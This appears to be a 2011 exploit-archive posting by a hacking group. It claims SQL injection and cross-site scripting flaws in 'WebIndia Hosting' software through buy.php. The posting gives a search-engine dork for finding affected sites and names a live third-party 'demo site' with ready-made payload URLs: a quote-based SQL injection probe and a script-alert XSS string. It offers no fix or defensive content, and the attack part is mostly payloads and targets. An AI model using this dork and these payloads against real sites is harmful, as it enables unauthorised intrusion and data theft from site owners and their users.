WebIndia Hosting suffers from cross site scripting and remote SQL injection vulnerabilities.
c2d539837c5d45e4f31332e145f4d666606789acf6bc6052bc9ebd5f81cc5c16
# Exploit Title: WebIndia Hosting Multiple Vulnerability
# Date: 06.12.2011 - 17:55
# Author: 3spi0n
# Software Website: https://www.newindiahosting.com/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Dorks: "Powered by New India Hosting"
[#] Vulnerable File : | buy.php |
[$] Demo Sites:
[~] https://mcxchakraa.com/buy.php?Id=1" [PhpSQLi]
[~] https://mcxchakraa.com/buy.php?Id=<script>alert('XSS')</script> [XSS]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
# Greetz: DarkDevilz.in - 3spi0n.net
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
# DarkDevilz - Defence And Destruction Group'z - TURKEY #
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>